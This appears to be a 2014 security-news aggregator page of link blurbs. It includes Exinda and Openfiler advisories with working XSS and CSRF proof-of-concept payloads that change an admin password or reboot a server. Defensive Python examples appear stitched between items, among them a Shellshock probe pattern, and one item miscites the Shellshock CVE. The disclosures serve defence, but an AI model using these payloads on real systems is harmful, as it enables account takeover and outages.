Channel: BOT24
Viewing all 8064 articles

Scammers Offer Up “Steam Wallet Codes”

Last week, we presented a list of online threats that users may encounter while on Steam and interacting with other gamers within the platform. As you may also know, there are threats that can be found outside of Steam that target and affect its users worldwide. Some of these threats have been discussed in the following Malwarebytes posts:

Buyer Beware: Steam Keys and What You Should Know
Search Engine Adverts: Download All The Things?
We recently found a fake online hacking tool catering to Steam users, the likes of which I’ve already seen in the past


more here.............https://blog.malwarebytes.org/fraud-scam/2014/09/scammers-offer-up-steam-wallet-codes/

Android-InsecureBankv

This is a major update to one of my previous projects - "InsecureBank". This vulnerable Android application is named "InsecureBankv2" and is made for security enthusiasts and developers to learn the Android insecurities by testing this vulnerable application. Its back-end server component is written in python. The client component i.e. the Android InsecureBank.apk can be downloaded along with the source code.


more here.............https://github.com/dineshshetty/Android-InsecureBankv2

Fileless Infections from Exploit Kit: An Overview

The exploit kit landscape is constantly changing and forcing security researchers to up their game.

There was a time when payloads were not even encrypted and web servers were not actually lying.

Unique patterns, packets that match the size of binaries on disk, all make things easier for the good guys to detect and block malicious activity. But the reality is this was just an adaptive phase when the bad guys did not need to spend any extra effort and still got what they wanted: high numbers of infections.


more here............https://blog.malwarebytes.org/exploits-2/2014/09/fileless-infections-from-exploit-kit-an-overview/

Script to decrypt des26 passwords used by ITS (Internet Transaction Server)

Decrypt des26 encrypted SAP ITS passwords here..............http://www.synacktiv.fr/ressources/SAP_ITS_des26_decrypt.py

XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite (CVE-2014-7157, CVE-2014-7158)

I. VULNERABILITY
-------------------------
XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite

II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:

III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Exinda WAN Optimization,
in the parameter “tabsel” of "/admin/launch?script=rh&template=sys-users&tabsel=",
in version v7.0.0 (2160). It allows arbitrary HTML/script code to be executed
in the context of the victim user's browser, which may allow a remote
attacker to forge requests that Exinda takes action upon.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-
users&tabsel=aaa
"><script>alert("Exinda XSS")</script>

POC CSRF
  <html>

<body onload="CSRF.submit();">

<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/launch?script=rh&template=sys-
users&tabsel=localusers
" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>

<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>

<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>

</body>
</html>

 Host=demo-nam-02.exinda.com:34896
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,
deflate Referer=https://10.0.1.120/exinda/csrf.php
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-
exinda.com-1411601373982-94280;
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;
__utmb=217124611.6.9.1411601437592; __utmc=217124611;
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=300

POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin
g&c_account=string&e_account=true&f_account=admin&d_password=password&
c_password=-
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd

V. BUSINESS IMPACT
-------------------------

The vulnerability allows arbitrary HTML/script code to be executed in the
context of the victim user's browser and the password of the admin user to be
changed without consent.

VI. REQUIREMENTS
-----------------------
An attacker needs to know the IP of the device.
An administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)

VIII. SOLUTION
-------------------------
All parameters must be validated, and an anti-CSRF token must be used.

Authored by William Costa
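The advisory's fix for the reflected XSS is input validation of "tabsel" plus output encoding. The following is an added illustration, not Exinda's code: a vulnerable renderer that reflects the parameter raw, beside a hardened one that allowlists the tab id and HTML-encodes it. ALLOWED_TABS (apart from "localusers", which appears in the PoC) and the markup are assumptions.

```python
import html

# Tab ids the sys-users template is allowed to select. "localusers" appears in the
# advisory's PoC; the other two are constructed placeholders for real tab ids.
ALLOWED_TABS = {"localusers", "remoteusers", "roles"}
DEFAULT_TAB = "localusers"

def render_tab_vulnerable(tabsel: str) -> str:
    # Reflects the raw parameter into an attribute and into text. A value such as
    # "><script>...</script> closes the attribute early and injects markup.
    return f'<a class="tab" href="?tabsel={tabsel}">{tabsel}</a>'

def render_tab_escaped_only(tabsel: str) -> str:
    # Output encoding alone: quote=True turns '"' into &quot;, so the attribute
    # cannot be closed and '<' / '>' become &lt; / &gt;.
    safe = html.escape(tabsel, quote=True)
    return f'<a class="tab" href="?tabsel={safe}">{safe}</a>'

def validate_tabsel(tabsel: str) -> str:
    # Input validation: only a known tab id is accepted, anything else falls back
    # to the default instead of being echoed.
    return tabsel if tabsel in ALLOWED_TABS else DEFAULT_TAB

def render_tab_hardened(tabsel: str) -> str:
    # Validate first, then still encode on output (defence in depth).
    return render_tab_escaped_only(validate_tabsel(tabsel))

def reflects_markup(rendered: str) -> bool:
    # A script tag surviving into the output means the injection worked.
    return "<script" in rendered.lower()

# Sample input: the payload from the advisory's PoC.
PAYLOAD = '"><script>alert("Exinda XSS")</script>'
```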

Pillars of Application Security

The hardest part of any good building project is laying a foundation and understanding what that foundation means. If you lay a square foundation but attempt to build a triangular building, sure, the foundation can support the building, but the foundation is either going to be too big or too small, and both have inherent issues. Defining the pillars of an App Security Program is much like laying the foundation. What do the pillars require? How many different ways do they need to support the app security program? Do I want a few big pillars from a high level or a few small narrowly scoped pillars?

more here...........http://security.howellsonline.ca/app-security-program-pillars/

Openfiler DoS via CSRF (CVE-2014-7190)

# Exploit author: @dolevff
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1 (latest)
# Alerted vendor: 7.5.14
# CVE-2014-7190


Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
Vulnerability Description
=========================
It is possible to restart or shut down a server running Openfiler, causing a denial of service, because the request is not protected by a session token.

Proof of Concept
=========================
<html>
<div align="center">
<pre>
<h2><b>DoS<b></h2>
<body>
<form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="attack" />
        </form>
        </body>
</div>
</html>
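Both the Openfiler shutdown form above and the Exinda password form earlier on this page are accepted on the strength of the browser's session cookie alone. The following added example (not code from either vendor) shows the server-side fix the advisories call for: a per-session anti-CSRF token embedded in the form and checked in constant time before the state-changing action runs, with an Origin/Referer check as a second layer. The field name "csrf_token", the in-memory store, OUR_HOST and the "halt" value are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Session id -> CSRF token. A constructed stand-in for a real session store.
SESSION_TOKENS: dict = {}
OUR_HOST = "ip.add.re.ss:446"   # placeholder host taken from the PoC's action URL

def issue_csrf_token(session_id: str) -> str:
    # One unguessable token per session, embedded in every state-changing form.
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token

def render_shutdown_form(session_id: str) -> str:
    # Same fields as the PoC form plus the hidden token (hypothetical field name).
    token = issue_csrf_token(session_id)
    return ('<form action="/admin/system_shutdown.html" method="POST">'
            f'<input type="hidden" name="csrf_token" value="{token}" />'
            '<input type="hidden" name="shutdowntype" value="reboot" />'
            '<input type="hidden" name="delay" value="0" />'
            '<input type="submit" name="action" value="Shutdown" /></form>')

def handle_shutdown(session_id: str, form: dict, headers: dict):
    # 1. A token must exist for this session and match, compared in constant time.
    expected = SESSION_TOKENS.get(session_id)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    # 2. Defence in depth: if Origin/Referer is present it must point at this host.
    source = headers.get("Origin") or headers.get("Referer")
    if source and urlparse(source).netloc != OUR_HOST:
        return 403, "request originated from another site"
    # 3. Only now act on the parameters ("halt" is a constructed alternative).
    if form.get("action") != "Shutdown" or form.get("shutdowntype") not in ("reboot", "halt"):
        return 400, "unexpected parameters"
    return 200, f"{form['shutdowntype']} scheduled in {int(form.get('delay', 0))}s"

# The PoC's cross-site POST: the victim's session cookie rides along, but there is
# no token and the Referer is a foreign page (constructed values).
FORGED_FORM = {"shutdowntype": "reboot", "delay": "0", "action": "Shutdown", "submit": "attack"}
FORGED_HEADERS = {"Referer": "https://attacker.example/dos.html"}
```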



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Shell Shock Exploitation Vectors

This is an incomplete catalog of potential exploitation vectors for CVE-2014-6721, or “Shell Shock”. I’m posting this hastily and will update it continuously with new findings. Please leave a comment if you can think of any vectors not listed here.

For a service to be vulnerable to Shell Shock, three conditions must be met:

It must set an environment variable whose value (not necessarily name) is attacker-controlled, and particularly must be made to begin with () {.
It must invoke bash.
The system must be running a vulnerable version of bash.


more here............https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html
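The first of the three conditions above is the one a defender can observe at the perimeter: a request header whose value starts with "() {" becomes an environment variable (HTTP_USER_AGENT, HTTP_REFERER, ...) once a CGI front end hands it on. The following added example, not code from the post, builds that CGI environment from sample headers and flags the variables a vulnerable bash would parse as function definitions; the sample requests are constructed.

```python
import re

# Condition 1 from the post: the value of an environment variable begins with "() {".
# Leading whitespace and missing spaces are tolerated: a detector should over-match
# rather than miss a variant.
FUNCTION_EXPORT = re.compile(r"^\s*\(\)\s*\{")

def is_function_export(value: str) -> bool:
    return FUNCTION_EXPORT.match(value) is not None

def cgi_environment(headers: dict, query_string: str = "") -> dict:
    # CGI copies each request header into the environment as HTTP_<NAME> (upper-cased,
    # hyphens to underscores). A bash CGI script, or one that calls system(), sees them.
    env = {"QUERY_STRING": query_string}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env

def suspicious_variables(env: dict) -> list:
    # Names of the variables whose value would be parsed as a function definition.
    return sorted(name for name, value in env.items() if is_function_export(value))

def triage(requests: list) -> list:
    return [suspicious_variables(cgi_environment(h)) for h in requests]

# Constructed sample requests as a CGI front end would receive them.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", "Referer": "https://example.test/"},
    {"User-Agent": "() { :; }; echo constructed-probe", "Cookie": "id=1"},
    {"User-Agent": "curl/7.37", "Referer": "   () { x; }; constructed",
     "Cookie": "note=() { not at the start, so not a function export"},
]
```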

Are You an Entrepreneur Looking For Capital?

Besides being an info security enthusiast I also look for projects or businesses to infuse my personal capital into. Specifically for unique opportunities from determined hungry individuals and entities alike. Typically when I look at a public company there are certain variables I pay particularly close attention to. That is income to debt ratios, trailing and forward multiples, top line growth, bottom line growth, and the list goes on. However here I'm open to you all. Hopefully you have a business prospectus or executive summary but it's not essential. If this sounds like you then contact me through Google Plus and we can talk further.


Regards

Bradley Susser

PKCS#1 signature validation

On Wednesday, Chrome and Mozilla did coordinated updates to fix an RSA signature verification bug in NSS - the crypto library that handles SSL in Firefox and (currently) Chrome on most platforms. The updates should be well spread now and the bug has been detailed on Reddit, so I think it's safe to talk about.

(Hilariously, on the same day, bash turned out to have a little security issue and so hardly anyone noticed the NSS one!)

more here.............https://www.imperialviolet.org/2014/09/26/pkcs1.html

Malvertising on The Pirate Bay

The Pirate Bay is famous for its tumultuous relationship with copyright advocates and law enforcement. And yet, despite police raids and numerous trials, the torrent site is still going strong with a new infrastructure, as detailed in a recent article published by Torrent Freak.

From a security standpoint, The Pirate Bay has been involved in notorious malvertising attacks, most likely resulting in a large number of infections given the site’s high traffic. BlueCoat and Malekal blogged about this before and what we caught in our honeypots today is not in fact all that different.

more here............https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-on-the-pirate-bay/

Bash bug: so, like, apply the unofficial patch now (CVE-2014-6277)

OK, rebuild bash and deploy Florian's unofficial patch now. If you're a distro maintainer, please consider doing the same.
My previous post has more information about the original vulnerability (CVE-2014-6271). It also explains Tavis' and my original negative sentiment toward the original upstream patch. In short, the revised code did not stop bash from parsing the code seen in potentially attacker-controlled, remotely-originating environmental variables. Instead, the fix simply seeks to harden the parsing to prevent RCE. It relies on two risky assumptions

more here.............http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html

Thinking outside the sandbox

Attacking the modern browser and its plug-ins is becoming harder as vendors employ numerous
mitigation technologies to increase the cost of exploit development. An attacker is now forced to
uncover multiple vulnerabilities to gain privileged-level code execution on his targets. First, an
attacker needs to find a vulnerability, leak an address to get around ASLR, and bypass DEP to gain
code execution within the renderer process. The attacker then needs to bypass the application
sandbox to elevate their privileges, which will allow them to execute malicious code. Our journey
begins at the sandbox and investigates some of the more obscure techniques used to violate this
trust boundary.


more here............http://h30499.www3.hp.com/hpeb/attachments/hpeb/off-by-on-software-security-blog/414/1/HPSR%20SecurityBriefing_Episode17_sandboxbypass.pdf

Solving FireEye's Flare On Six via Side Channels

This summer FireEye put out a series of seven reverse engineering challenges called the Flare On Challenge. The challenges all have a malware theme to them as it was presumably an avenue of recruiting for the team. A friend brought Flare On to my attention so I decided to register and give it a go once it went live. I played when I could find some free time outside my internship and ended up squeezing onto the honor roll, finishing in ~2.5 days.

A lot of people choked on level six in the series and, looking at the released statistics, ~42% of the people that made it to level six did not solve it, the biggest drop rate for any of the Flare On levels. There have been two or three eager write-ups released for level six so far, but the methods I've seen involved tedious amounts of stepping through the spaghetti monster or a lot of deobfuscation + reversing. I did it pretty differently and figured some of the late solvers might appreciate how I (and probably a few others) cut through this challenge so quickly.



more here...............http://gaasedelen.blogspot.com/2014/09/solving-fireeyes-flare-on-six-via-side.html

Mining Bitcoin with pencil and paper: 0.67 hashes per day

I decided to see how practical it would be to mine Bitcoin with pencil and paper. It turns out that the SHA-256 algorithm used for mining is pretty simple and can in fact be done by hand. Not surprisingly, the process is extremely slow compared to hardware mining and is entirely impractical. But performing the algorithm manually is a good way to understand exactly how it works.

more here..........http://www.righto.com/2014/09/mining-bitcoin-with-pencil-and-paper.html
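What the pencil-and-paper post works through by hand is one evaluation of the mining loop: hash the 80-byte block header with SHA-256 twice, read the result as a little-endian integer, and compare it with the target decoded from the header's "bits" field. The following added example (not the post's code) does exactly that with hashlib and a deliberately easy constructed target so the nonce search finishes in a fraction of a second; the header values are constructed.

```python
import hashlib
import struct

def double_sha256(data: bytes) -> bytes:
    # Bitcoin hashes the header with SHA-256 twice; by hand that is two full runs of the algorithm.
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def bits_to_target(bits: int) -> int:
    # Decode the compact "bits" field: one byte of exponent, three bytes of mantissa.
    exponent, mantissa = bits >> 24, bits & 0xFFFFFF
    if exponent <= 3:
        return mantissa >> (8 * (3 - exponent))
    return mantissa << (8 * (exponent - 3))

def block_header(version: int, prev_hash: bytes, merkle_root: bytes,
                 timestamp: int, bits: int, nonce: int) -> bytes:
    # 80-byte header: little-endian integers; the two 32-byte hashes are stored byte-reversed.
    return (struct.pack("<I", version) + prev_hash[::-1] + merkle_root[::-1]
            + struct.pack("<III", timestamp, bits, nonce))

def header_hash(header: bytes) -> int:
    # The hash is compared as a little-endian 256-bit integer.
    return int.from_bytes(double_sha256(header), "little")

def mine(version, prev_hash, merkle_root, timestamp, bits, max_nonce=1 << 32):
    # Increment the nonce until the header hash drops below the target.
    target = bits_to_target(bits)
    for nonce in range(max_nonce):
        h = header_hash(block_header(version, prev_hash, merkle_root, timestamp, bits, nonce))
        if h < target:
            return nonce, h
    return None

def display_hash(h: int) -> str:
    # Block explorers print the hash big-endian with leading zeros, which is where the
    # familiar run of zeros comes from.
    return format(h, "064x")

# Constructed inputs. bits=0x2000FFFF gives a target near 2**248, so roughly one try in 256
# succeeds; real difficulty would need billions of tries per nonce range.
EASY_BITS = 0x2000FFFF
SAMPLE = dict(version=2, prev_hash=bytes(32),
              merkle_root=hashlib.sha256(b"constructed coinbase").digest(),
              timestamp=1411980000, bits=EASY_BITS)
```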

Volatility autoruns plugin

Finding persistence points (also called "Auto-Start Extensibility Points", or ASEPs) is a recurring task of any investigation potentially involving malware.

To make an analyst's life a bit easier, I came up with the autoruns plugin. autoruns basically automates most of the tasks you would need to run when trying to find out where malware is persisting from. Once all the autostart locations are found, they are matched with running processes in memory.

more here...........https://github.com/tomchop/volatility-autoruns/

Solving IOLI-crackme with Dynamic Binary Modification and GDB

I don't commonly see Dynamic Binary Modification (DBM) being used for reverse engineering and binary patching, which is a shame since it's quite a good tool for this sort of thing. Compared to regular binary patching, it has the advantage that the executable remains unmodified on disk and appears unmodified in memory at runtime.

more here...............https://github.com/lgeek/ioli_crackme_dbm_solution

Predictive Research: Malware, You're Doing It Wrong

I sat down this weekend to document the inspiring thoughts behind a talk I gave at Next Generation Threats last week in Stockholm. The initial idea was to outline how today's threat detection systems work and how they are bound to fail in specific situations.

more here...........http://0x1338.blogspot.co.at/2014/09/predictive-research-malware-youre-doing.html

A BRIEF ANALYSIS OF AN SMS SPAM CAMPAIGN

A few days ago I got a message from a friend asking if I could investigate a message he had gotten by SMS about possibly having won 10 000 SEK at Swedish supermarket chain ICA. I said “sure, why not” and spent a few hours digging around. As it turns out, the message in question was nothing more than a spam campaign trying to get people to fill out a survey and thereby give out their email addresses and sign up for different “offers”, but there were some parts about it that triggered my curiosity so I thought I’d do a brief write-up. Please note that this was done during a pretty busy weekend, so you’ll have to forgive my somewhat high level analysis.

more here............https://3vildata.com/?p=1159

Update: XORSearch With Shellcode Detector

XORSearch allows you to search for strings and embedded PE-files brute-forcing different encodings. Now I added shellcode detection.

This new version of XORSearch integrates Frank Boldewin’s shellcode detector.


more here............http://blog.didierstevens.com/2014/09/29/update-xorsearch-with-shellcode-detector/
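The brute-force idea behind XORSearch is simple enough to show in a few lines: decode the file under every candidate key of each encoding and look for the string. The following added example is not XORSearch's code; it covers two of the encodings the tool tries (single-byte XOR and bit rotation) and uses the DOS stub string of a PE header as the needle, which is how embedded executables are found. The samples are constructed.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def rol_byte(b: int, bits: int) -> int:
    return ((b << bits) | (b >> (8 - bits))) & 0xFF

def rol_bytes(data: bytes, bits: int) -> bytes:
    return bytes(rol_byte(b, bits) for b in data)

def ror_bytes(data: bytes, bits: int) -> bytes:
    # Undo a left rotation by rotating left the rest of the way round.
    return rol_bytes(data, 8 - bits)

def xor_search(data: bytes, needle: bytes) -> list:
    # Try every single-byte XOR key (key 0 is the plaintext) and every ROL amount,
    # returning (encoding, key, offset) for each decoding in which the needle appears.
    hits = []
    for key in range(256):
        offset = xor_bytes(data, key).find(needle)
        if offset != -1:
            hits.append(("XOR", key, offset))
    for bits in range(1, 8):
        offset = ror_bytes(data, bits).find(needle)
        if offset != -1:
            hits.append(("ROL", bits, offset))
    return hits

# The string every PE carries in its DOS stub; a hit means an embedded executable.
DOS_STUB = b"This program cannot be run in DOS mode"

# Constructed samples: a PE-like fragment hidden with XOR key 0x5A, and the same
# fragment hidden with a 3-bit left rotation, each behind two bytes of filler.
FRAGMENT = b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB + b"\x00" * 16
SAMPLE_XOR = b"\x41\x42" + xor_bytes(FRAGMENT, 0x5A)
SAMPLE_ROL = b"\x41\x42" + rol_bytes(FRAGMENT, 3)
```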